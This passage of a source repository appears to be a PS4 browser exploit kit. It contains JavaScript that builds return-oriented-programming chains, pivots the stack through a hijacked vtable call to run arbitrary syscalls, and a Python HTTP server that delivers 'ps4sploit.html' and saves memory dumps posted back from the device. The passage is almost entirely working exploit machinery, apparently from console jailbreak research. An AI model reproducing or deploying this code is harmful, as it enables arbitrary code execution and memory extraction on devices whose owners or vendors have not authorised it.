114 |         this.add("syscall")
115 |     }
116 |     
117 |     // credits to CTurt
118 |     this.call = function(address, arg1, arg2, arg3, arg4, arg5, arg6) {
119 |         this.add("pop rdi");
120 |         this.add(typeof(arg1) !== "undefined" ? arg1 : 0)
121 |         this.add("pop rsi");
122 |         this.add(typeof(arg2) !== "undefined" ? arg2 : 0)
123 |         this.add("pop rdx");
124 |         this.add(typeof(arg3) !== "undefined" ? arg3 : 0)
125 |         this.add("pop rcx");
126 |         this.add(typeof(arg4) !== "undefined" ? arg4 : 0)
127 |         this.add("pop r8");
128 |         this.add(typeof(arg5) !== "undefined" ? arg5 : 0)
129 |         this.add("pop r9");
130 |         this.add(typeof(arg6) !== "undefined" ? arg6 : 0)
131 |         
132 |         this.rop_chain.push(address.getLowBitsUnsigned());
133 |         this.rop_chain.push(address.getHighBitsUnsigned());
134 |     }
135 | 
136 |     this.execute = function() {
137 |         var xchg = gadgets['xchg rax, rsp; dec dword ptr [rax - 0x77]'];
138 |         rop_buf[2] = xchg.addr().getLowBitsUnsigned()
139 |         rop_buf[3] = xchg.addr().getHighBitsUnsigned()
140 | 
141 |         var poprcxx2 = gadgets['pop rcx; pop rcx'];
142 |         rop_buf[0] = poprcxx2.addr().getLowBitsUnsigned()
143 |         rop_buf[1] = poprcxx2.addr().getHighBitsUnsigned()
144 | 
145 |         // Code to restore the stack pointer
146 |         this.add('pop rax')
147 |         this.add(this.store_rsp_addr)
148 |         this.add('mov rax, qword ptr [rax]')
149 |         this.add('pop rdi')
150 |         addr = new dcodeIO.Long(cbuf[0x14], cbuf[0x15], true).add(4 * (this.rop_chain.length + 0x6 + 0x6));
151 |         this.add(addr)
152 |         this.add('mov qword ptr [rdi], rax')
153 |         this.add('pop rsp')
154 | 
155 |         // Actually write the chain to the buffer
156 |         for (var i = 0; i < this.rop_chain.length; i++) {
157 |             rop_buf[0x6 + i] = this.rop_chain[i]
158 |         }
159 |         // Make the vtable call
160 |         old_low = cbuf[0x10]
161 |         old_high = cbuf[0x11]
162 |         cbuf[0x10] = cbuf[0x14]
163 |         cbuf[0x11] = cbuf[0x15]
164 |         rop_buf.byteLength;
165 |         cbuf[0x10] = old_low
166 |         cbuf[0x11] = old_high
167 |     }
168 | 
169 |     // Code to cleanup the modification done by by the stack pivot
170 |     // and to store the original stack pointer
171 |     // We are going to store it right below the user storage address
172 |     this.store_rsp_addr = storage.initial_addr.sub(0x8)
173 |     this.add('pop rcx')
174 |     this.add(1)
175 |     this.add('add dword ptr [rax - 0x77], ecx')
176 |     this.add('pop rdi')
177 |     this.add(this.store_rsp_addr);
178 |     this.add('mov qword ptr [rdi], rax')
179 | }
180 | 


--------------------------------------------------------------------------------
/server.py:
--------------------------------------------------------------------------------
 1 | import BaseHTTPServer
 2 | import json
 3 | import SocketServer
 4 | 
 5 | #!/usr/bin/env python
 6 | import SimpleHTTPServer
 7 | 
 8 | HOST_NAME = '0.0.0.0'
 9 | PORT_NUMBER = 80
10 | 
11 | dump_index = 0
12 | 
13 | 
14 | class PS4Server(SimpleHTTPServer.SimpleHTTPRequestHandler):
15 |     def do_GET(self):
16 |         if '/scripts/' in self.path:
17 |             self.send_response(200)
18 |             self.send_header("Content-type", "text/html")
19 |             self.end_headers()
20 |             path = self.path[1:]
21 |             self.wfile.write(open(path).read())
22 |         else:
23 |             self.send_response(200)
24 |             self.send_header("Content-type", "text/html")
25 |             self.end_headers()
26 |             self.wfile.write(open('ps4sploit.html').read())
27 | 
28 |     def do_POST(self):
29 |         if '/debug/log' in self.path:
30 |             data_string = self.rfile.read(int(self.headers['Content-Length']))
31 |             self.send_response(200)
32 |             self.end_headers()
33 |             print data_string
34 |         if '/debug/bin' in self.path:
35 |             global dump_index
36 |             filename = self.path.split("/")[-1]
37 |             if filename is "undefined":
38 |                 filename = 'dump_%s.bin' % dump_index
39 |                 dump_index += 1
40 |             data_string = self.rfile.read(int(self.headers['Content-Length']))
41 |             self.send_response(200)
42 |             self.end_headers()
43 |             f = open('dumps/'+filename, mode='wb')
44 |             f.write(data_string)
45 |             f.close()
46 |             print 'Saved dump to %s' % filename
47 | 
48 |     def log_message(self, format, *args):
49 |         pass
50 | 
51 | 
52 | if __name__ == '__main__':
53 |     dump_index = 0
54 |     server_class = BaseHTTPServer.HTTPServer
55 |     httpd = server_class((HOST_NAME, PORT_NUMBER), PS4Server)
56 |     try:
57 |         httpd.serve_forever()
58 |     except KeyboardInterrupt:
59 |         pass
60 |     httpd.server_close()
61 | 


--------------------------------------------------------------------------------